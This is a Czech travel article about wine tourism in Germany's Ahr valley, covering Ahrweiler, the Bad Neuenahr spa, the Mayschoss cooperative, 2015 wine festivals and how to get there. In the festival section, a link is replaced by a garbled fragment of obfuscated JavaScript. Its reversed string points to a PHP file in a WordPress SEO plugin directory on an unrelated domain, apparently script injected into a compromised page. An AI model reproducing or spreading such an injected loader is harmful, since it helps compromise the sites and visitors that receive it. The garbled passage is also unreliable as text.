FACESTARCestováníCESTUJEME ZA VÍNEM: POZNEJTE S NÁMI ÁRU, DIVOKOU DCERU RÝNA.

CESTUJEME ZA VÍNEM: POZNEJTE S NÁMI ÁRU, DIVOKOU DCERU RÝNA.

 

 

Na východním břehu Rýna, se do pevniny zařezává údolí řeky Áry (Ahr) romantiky nazývaná „divoká dcera Rýna“. Její půvabné asi 35 kilometrů dlouhé údolí lemují strmé skalní útesy, révou osázené slunečné svahy a hustě zalesněné kopce na severu. Pokud je Rýn zaslíbenou řekou bílého vína, je Ahr tím samým pro víno červené. Pěstují se zde tradiční odrůdy červených hroznů Spätburgunder jedinečné díky místnímu mikroklimatu minerálních pramenů, v nichž se lze i koupat (Bad Neuenahr).

K nejpůvabnějším místům v údolí patří středověké městečko Ahrweiler, za jehož hradbami se tyčí strmé vinice s červenými hrozny, protkané stezkami pro pěší, restauracemi a ubytovacími hostinci. Nezapomeňte však při procházce vinicemi navštívit obrovskou římskou vilu z 5. století (Villa Rustica), která byla nedávno objevena při stavbě silnice z Ahrweileru. Právě zde leží počátek úctyhodné německé vinařské tradice, započaté před 1500 lety.

Bad Neuenahr

and

Milovníci lázeňské pohody mohou po výletu vinnými stezkami odpočívat v městečku Bad Neuenahr. To plnilo v 19. století úlohu módních lázní, jak prozrazují četné budovy z období Belle Époque. Lázně však nezaostávaly ve vývoji a velkorysé termální koupele jsou přitažlivé nejen pro ty, kdo pečují o své zdraví, ale i pro ty, kdo si chtějí vychutnat příjemně temperované kryté i otevřené bazény, vířivky a podobně. Léčivá minerální voda, která pramení v hloubce 359 m, se složitě filtruje a průběžně se přivádí do čtyř velkých nádrží. Voda dosahující teploty 28 až 37 °C se v nádržích neustále vyměňuje.

Jak dokazují jiné nálezy z Villa Rustica, již Římané dokázali docenit význam slunných svahů v blízkosti středního toku řeky Ahr a byli to pravděpodobně oni, kdo tu začali pěstovat vinnou révu. Kdo by se chtěl seznámit s historií kultury vína v údolí, měl by navštívit AhrWeinForum v Ahrweileru. Vystavené exponáty – nářadí, poháry, sakrální umění k tomuto tématu, násosky na víno, dokumenty – podávají svědectví o historii vína od 8. do 21. století.

and

Mikroklima svahů obrácených převážně k jihu bývá v letních měsících téměř středomořské. Břidlice a drobová půda, skály a suché zdivo se během dne silně zahřívají a v noci předávají své teplo vinné révě. Úzké údolí chrání před přílivem studeného vzduchu od severu. Výsledkem jsou nejen vína oblíbená při přátelském posezení, ale i červená a bílá vína zajímavá pro znalce. Nejpěstovanějšími druhy jsou pozdní burgundské a modrý Portugal, ale i vzácnější rané burgundské nebo ryzlink.

Nejkrásnější zážitky nabízí údolí červených hroznů při putování mezi vinicemi, kdy se před návštěvníky otevírají stále nové výhledy do krajiny. Kdo si však pro svou cestu za vínem zvolí zlatý říjen, neměl by očekávat poklidný pobyt. Právě na podzim do údolí řeky Ahr směřuje téměř půldruhého milionu návštěvníků. Turistická trasa – vyznačená červenými hrozny – vede v délce 35 km po pahorcích a výšinách, podél charizmatických vinařských usedlostí, umístěných většinou uprostřed vinohradů. Na svazích porostlých vinnou révou objeví pozorný poutník jména předních vinařů.

Milovníci vína mohou kapku vzácného moku ochutnat na známých i méně známých vinicích a mohou si tu i nějakou tu lahvinku zakoupit. I vinařská družstva v tuto dobu otevírají sklepy. Mayschoss – Altenahr, založené v roce 1868 jako první německé vinařské družstvo patří v údolí červených hroznů k těm nejznámějším. Staré vinné sklepy navštíví každý rok půl milionu milovníků vína. Každý z nich si tu může ochutnat nápoj vytvořený efektivním spojením moderní techniky a tradičních procedur zrání v dřevěných sudech.

Ahrweiler

and

Městečko Ahrweiler je hrdé na svou více než tisíc let starou tradici pěstování a výroby červeného vína. „Okrášlené svými starými zdmi, cimbuřími a věžičkami, olemováno vínem je to nejpůvabnější malé staroněmecké město, které jsem kdy viděl.“ napsal spisovatel Immermann. Pravda, takto nadšeně se o městě vyjadřoval v roce 1832, ale ten, kdo toto město staré jedenáct století navštíví dnes, zjistí, že starostlivá péče a pozorné restaurování dokázaly jeho ráz zachovat. Kromě přívětivých vináren a historických hostinců tu stojí kostel sv. Vavřince z roku 1269, první gotický síňový kostel v Porýní, s překrásnými freskami z pozdního období, na nichž jsou znázorněny motivy pěstování vinné révy a svatí ochránci.

Městské hradby s branami, patronky čtyř městských čtvrtí – Maria, Uršula, Barbara a Kateřina, městský kostel, radnice, klášter a šlechtická sídla – to vše připomíná dobu, kdy Ahrweiler bylo ještě hlavním městem lázeňské oblasti.

Slavnosti vína

and

Stejně jako na Rýnu, se i v údolí řeky Áry pořádají tradiční vinařské slavnosti. Trhy, procesí, koncerty a ohňostroje lákají milovníky červeného na ochutnávky a samozřejmě i na nákup vína. To vše v romantických kulisách historických městeček obklopených strmými svahy vinic. Není divu, že sem každoročně míří nejen znalci vína, ale i turisté.

Za návštěvu stojí např. rozsáhlé vinařské sklepy v  Mayschossu, tamní vinařské slavnosti začínají 3. října 2015 a probíhají po čtyři týdny. Za prohlídku zcela jistě stojí také prohlídka místních rozsáhlých sklepů, které patří nejstaršímu vinařskému družstvu v Německu. Informace najdete na $nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahanderweg.de/feste/weinfeste-2015-nach-datum/“>zde.

Slavnosti vína v půvabném středověkém městečku Ahrweiler letos proběhnou o víkendu 11. – 13. 9. 2015 (www.ahrtal.de), v blízkém  Dernau od 25. do 28. 9. 2015.

Jak cestovat za vínem?

and

Samozřejmě můžete zvolit soukromou jízdu autem a pomalu se kochat přírodními krásami. My však doporučujeme leteckou přepravu, pro nedočkavce ideální a nejrychlejší varianta. Z České Republiky se do této vinařské oblasti (letiště Bonn/Kolín nad Rýnem) dostanete rychle a levně letecky s Germanwings, více informací na www.germanwings.de. Z Bonnu je do údolí řeky Ahr frekventované vlakové spojení.

Související články